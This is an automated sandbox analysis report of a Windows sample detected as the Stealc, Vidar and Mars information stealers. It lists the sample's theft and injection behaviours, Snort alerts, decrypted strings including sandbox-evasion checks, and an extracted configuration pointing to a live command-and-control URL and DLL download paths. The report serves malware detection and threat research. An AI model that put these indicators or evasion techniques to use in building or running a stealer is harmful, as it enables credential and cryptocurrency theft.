Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Overview

General Information

Sample name:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Analysis ID:1454088
MD5:9c2b900d014ba5b9dfd0ca6cef201753
SHA1:e5705841f68d9443ba5efb553aa9f87556e403e5
SHA256:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
Tags:exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe" MD5: 9C2B900D014BA5B9DFD0CA6CEF201753)
    • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}

Threatname: Vidar

{"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
        00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
              Click to see the 6 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.aspnet_regiis.exe.2750000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                2.2.aspnet_regiis.exe.2750000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                  0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                      2.2.aspnet_regiis.exe.2750000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 5 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        Timestamp:06/08/24-20:21:59.805841
                        SID:2051828
                        Source Port:80
                        Destination Port:49731
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/08/24-20:21:59.555146
                        SID:2044244
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/08/24-20:22:00.160152
                        SID:2051831
                        Source Port:80
                        Destination Port:49731
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/08/24-20:21:58.692257
                        SID:2044243
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:06/08/24-20:21:59.902142
                        SID:2044246
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpGSAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpwserAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOVAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpCAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.php?SAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9Avira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpmAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllperaAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpiSSAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phppenSSHAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAVAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpzAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0bAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpition:Avira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpdus.walletAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYWAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.php)Avira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpcSAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleVAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3xAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134Avira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4Avira URL Cloud: Label: malware
                        Source: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://23.88.106.134/6a9f8e2503d99c04.php6Avira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
                        Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/6a9f8e2503d99c04.php"}
                        Multi AV Scanner detection for domain / URL
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpVirustotal: Detection: 12%Perma Link
                        Source: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dllVirustotal: Detection: 11%Perma Link
                        Source: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dllVirustotal: Detection: 12%Perma Link
                        Source: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllVirustotal: Detection: 11%Perma Link
                        Source: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllVirustotal: Detection: 11%Perma Link
                        Source: http://23.88.106.134/6a9f8e2503d99c04.phpition:Virustotal: Detection: 11%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\d3d9.dllReversingLabs: Detection: 79%
                        Multi AV Scanner detection for submitted file
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeReversingLabs: Detection: 37%
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeVirustotal: Detection: 34%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\d3d9.dllJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: INSERT_KEY_HERE
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetProcAddress
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: LoadLibraryA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: lstrcatA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: OpenEventA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateEventA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CloseHandle
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Sleep
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetUserDefaultLangID
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: VirtualAllocExNuma
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: VirtualFree
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetSystemInfo
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: VirtualAlloc
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HeapAlloc
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetComputerNameA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: lstrcpyA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetProcessHeap
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetCurrentProcess
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: lstrlenA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ExitProcess
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetSystemTime
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SystemTimeToFileTime
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: advapi32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: gdi32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: user32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: crypt32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ntdll.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetUserNameA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateDCA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetDeviceCaps
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ReleaseDC
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CryptStringToBinaryA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sscanf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: VMwareVMware
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HAL9TH
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: JohnDoe
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DISPLAY
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %hu/%hu/%hu
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: http://23.88.106.134
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /6a9f8e2503d99c04.php
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /566d6e1ec8db6394/
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: cuapfss
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetEnvironmentVariableA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetFileAttributesA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GlobalLock
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HeapFree
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetFileSize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GlobalSize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: IsWow64Process
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Process32Next
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetLocalTime
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FreeLibrary
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetTimeZoneInformation
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetSystemPowerStatus
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetVolumeInformationA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetWindowsDirectoryA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Process32First
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetLocaleInfoA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetModuleFileNameA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DeleteFileA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FindNextFileA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: LocalFree
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FindClose
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SetEnvironmentVariableA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: LocalAlloc
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetFileSizeEx
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ReadFile
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SetFilePointer
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: WriteFile
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateFileA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FindFirstFileA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CopyFileA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: VirtualProtect
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetLastError
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: lstrcpynA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: MultiByteToWideChar
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GlobalFree
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: WideCharToMultiByte
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GlobalAlloc
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: OpenProcess
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: TerminateProcess
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetCurrentProcessId
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: gdiplus.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ole32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: bcrypt.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: wininet.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: shlwapi.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: shell32.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: psapi.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: rstrtmgr.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateCompatibleBitmap
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SelectObject
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BitBlt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DeleteObject
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateCompatibleDC
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipGetImageEncodersSize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipGetImageEncoders
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdiplusStartup
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdiplusShutdown
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipSaveImageToStream
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipDisposeImage
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GdipFree
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetHGlobalFromStream
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CreateStreamOnHGlobal
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CoUninitialize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CoInitialize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CoCreateInstance
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptDecrypt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptSetProperty
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptDestroyKey
